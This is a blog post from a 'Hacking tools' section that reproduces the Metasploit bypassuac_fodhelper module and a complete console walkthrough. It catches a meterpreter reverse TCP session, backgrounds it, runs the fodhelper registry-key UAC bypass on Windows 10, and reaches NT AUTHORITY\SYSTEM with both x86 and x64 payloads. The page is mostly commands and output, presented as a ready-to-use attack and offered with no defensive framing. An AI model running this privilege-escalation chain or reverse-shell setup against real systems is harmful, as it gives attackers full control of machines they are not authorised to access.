All for Joomla All for Webmasters
Hacking tools

UAC bypass module for Windows 10 – Metasploit

This module exploit a recently disclosed bypassuac method on windows 10 that is currently unpatched.
By editing a registry key and launching fodhelper.exe autoelevated process, one can get an elevated meterpreter session without dropping any file.
This technique is highly similar to the bypassuac_eventvwr module.

Windows 10×64 With x86 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on :4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 1 opened (:4567 -> :49422) at 2017-06-01 10:05:04 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785Jmsfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on :4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:WindowsSysnativecmd.exe /c C:WindowsSystem32fodhelper.exe
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 2 opened (:4444 -> :49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-AI9785Jmsfuser
meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > 

Windows 10×64 with x64 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on :4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 
[*] Meterpreter session 1 opened (:4567 -> :49424) at 2017-06-01 10:07:48 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuyid
[-] Unknown command: getuyid.
meterpreter > getuid
Server username: DESKTOP-AI9785Jmsfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on :4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:Windowssystem32cmd.exe /c C:WindowsSystem32fodhelper.exe
[*] Sending stage (957487 bytes) to 
[*] Meterpreter session 2 opened (:4444 -> :49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785Jmsfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > 
UAC bypass module for Windows 10 – Metasploit
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

To Top
Facebook Auto Publish Powered By : XYZScripts.com

Get your Daily Tech update

Subscribe to TechWorld Daily Email Newsletter

Get Daily Tech News & Notifications about technology of our life to you via Email.

*use valid email address